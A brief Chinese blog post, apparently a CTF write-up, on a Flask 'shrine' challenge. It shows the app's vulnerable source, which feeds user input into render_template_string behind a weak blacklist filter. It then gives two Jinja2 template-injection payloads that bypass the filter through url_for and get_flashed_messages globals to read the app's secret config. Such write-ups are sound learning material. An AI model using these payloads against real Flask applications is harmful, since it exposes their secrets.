标签:url join name 原来 global payload sdn load ace
这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923
开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码:
import flask
import os
app = flask.Flask(__name__)
app.config[‘FLAG‘] = os.environ.pop(‘FLAG‘)
@app.route(‘/‘)
def index():
return open(__file__).read()
@app.route(‘/shrine/<path:shrine>‘)
def shrine(shrine):
def safe_jinja(s):
s = s.replace(‘(‘, ‘‘).replace(‘)‘, ‘‘)
blacklist = [‘config‘, ‘self‘]
return ‘‘.join([‘{{% set {}=None%}}‘.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == ‘__main__‘:
app.run(debug=True)
这里,等我这两天要学一下这个flask和os。
文章里给了两种解决方法。
方法一payload:
/shrine/{{url_for.__globals__[‘current_app‘].config[‘FLAG‘]}}
方法二payload:
/shrine/{{get_flashed_messages.__globals__[‘current_app‘].config[‘FLAG‘]}}
-完-
标签:url join name 原来 global payload sdn load ace
原文地址:https://www.cnblogs.com/a16n/p/12850773.html
